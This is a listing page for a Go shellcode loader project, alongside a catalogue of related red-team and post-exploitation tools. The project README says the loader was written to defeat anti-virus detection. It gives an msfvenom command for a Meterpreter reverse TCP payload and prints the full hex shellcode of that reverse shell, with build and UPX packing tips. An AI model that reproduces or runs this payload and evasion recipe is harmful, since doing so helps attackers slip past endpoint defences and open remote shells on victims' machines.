All Projects → brimstone → Go Shellcode

brimstone / Go Shellcode

Load shellcode into a new process

Programming Languages

go
31211 projects - #10 most used programming language
shellcode
44 projects

Projects that are alternatives of or similar to Go Shellcode

Viper
metasploit-framework 图形界面 / 图形化内网渗透工具
Stars: ✭ 487 (+6.8%)
Mutual labels:  redteam, post-exploitation
Atomic Red Team Intelligence C2
ARTi-C2 is a post-exploitation framework used to execute Atomic Red Team test cases with rapid payload deployment and execution capabilities via .NET's DLR.
Stars: ✭ 87 (-80.92%)
Mutual labels:  redteam, post-exploitation
Gtfobins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Stars: ✭ 6,030 (+1222.37%)
Mutual labels:  redteam, post-exploitation
Emp3r0r
linux post-exploitation framework made by linux user
Stars: ✭ 419 (-8.11%)
Mutual labels:  redteam, post-exploitation
ligolo-ng
An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.
Stars: ✭ 418 (-8.33%)
Mutual labels:  post-exploitation, redteam
Oscp Pentest Methodologies
备考 OSCP 的各种干货资料/渗透测试干货资料
Stars: ✭ 166 (-63.6%)
Mutual labels:  redteam, post-exploitation
Phpsploit
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Stars: ✭ 1,188 (+160.53%)
Mutual labels:  redteam, post-exploitation
gtfo
Search for Unix binaries that can be exploited to bypass system security restrictions.
Stars: ✭ 88 (-80.7%)
Mutual labels:  post-exploitation, redteam
Dns Persist
DNS-Persist is a post-exploitation agent which uses DNS for command and control.
Stars: ✭ 191 (-58.11%)
Mutual labels:  redteam, post-exploitation
Fudgec2
FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.
Stars: ✭ 191 (-58.11%)
Mutual labels:  redteam, post-exploitation
redpill
Assist reverse tcp shells in post-exploration tasks
Stars: ✭ 142 (-68.86%)
Mutual labels:  post-exploitation, redteam
Pivotsuite
Network Pivoting Toolkit
Stars: ✭ 329 (-27.85%)
Mutual labels:  redteam, post-exploitation
Swap digger
swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics. It automates swap extraction and searches for Linux user credentials, web forms credentials, web forms emails, http basic authentication, Wifi SSID and keys, etc.
Stars: ✭ 354 (-22.37%)
Mutual labels:  post-exploitation
Covertutils
A framework for Backdoor development!
Stars: ✭ 424 (-7.02%)
Mutual labels:  post-exploitation
Impost3r
👻Impost3r -- A linux password thief
Stars: ✭ 355 (-22.15%)
Mutual labels:  redteam
Mssqlproxy
mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse
Stars: ✭ 433 (-5.04%)
Mutual labels:  post-exploitation
Cobalt strike extension kit
Attempting to be an all in one repo for others' userful aggressor scripts as well as things we've found useful during Red Team Operations.
Stars: ✭ 345 (-24.34%)
Mutual labels:  redteam
Orc
Orc is a post-exploitation framework for Linux written in Bash
Stars: ✭ 349 (-23.46%)
Mutual labels:  post-exploitation
Ttps
Tactics, Techniques, and Procedures
Stars: ✭ 335 (-26.54%)
Mutual labels:  redteam
Redteam Research
Collection of PoC and offensive techniques used by the BlackArrow Red Team
Stars: ✭ 330 (-27.63%)
Mutual labels:  redteam

shellcode

This is a program to run shellcode as its own process, all from memory. This was written to defeat anti-virus detection.

Usage

Keep in mind that only 64bit shellcode will run in a 64bit process. This can't autodetect your shellcode architecture.

Use msfvenom or metasploit to generate a bit of shellcode as hex format:

$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:\windows\temp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5

Sometimes the shellcode is larger than the limit of a command line with arguments. Try putting the whole thing in a batch script instead.

Build

Standard go building steps. Set GOOS to windows and GOARCH to the same as your shellcode, either 386 or amd64. This can't detect the architecture of your shellcode.

The resulting binary is a little big, 2.1M, but compresses well with UPX, roughly 508K.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].